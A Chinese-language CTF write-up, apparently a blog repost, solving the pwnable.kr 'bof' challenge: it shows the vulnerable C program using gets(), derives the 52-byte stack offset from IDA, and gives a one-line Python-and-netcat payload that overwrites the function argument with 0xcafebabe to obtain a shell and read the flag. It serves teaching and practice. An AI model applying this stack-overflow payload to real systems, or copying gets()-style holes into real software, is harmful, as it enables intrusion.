首页 > 代码库 > PWN学习003 bof

PWN学习003 bof

  • 先看程序

技术分享

技术分享

  • 下载相应代码和程序。
  • 查看源码。
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key)
{
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);    // smash me!
    if(key == 0xcafebabe)
    {
        system("/bin/sh");
    }
    else
    {
        printf("Nah..\n");
    }
}

int main(int argc, char* argv[])
{
    func(0xdeadbeef);
    return 0;
}
  • 只要 key == 0xcafebabe 就可以执行本机的/bin/sh,所以只要让key等于0xcafebabe即可,但是,输入的key确是0xdeadbeef明显不同,但是我们可以利用那个gets输入,可以溢出func(0xdeadbeef)这个输入参数。

技术分享

  • IDA打开软件F5查看,发现char s //[sp + 1Ch] [bp - 2Ch] 说明,这个字符串s 是从[bp - 2Ch]处开始进入栈缓冲区的,所以我们只要覆盖2C字节,再加上EBP,EIP,就可以成功覆盖第一个变量,也就是func里面的参数,只要把它覆盖成我们想要的参数0xcafebabe即可。

 

技术分享

  • 我们写一个简单的脚本:
cat <(python -c "print ‘\x11‘*52+‘\xbe\xba\xfe\xca‘") - | nc pwnable.kr 9000
  • 前面52个字符任意都可,后面四个是我们特定制定的参数,也就是:0xcafebabe。
  • 执行成功后cat flag即可得到flag值。

PWN学习003 bof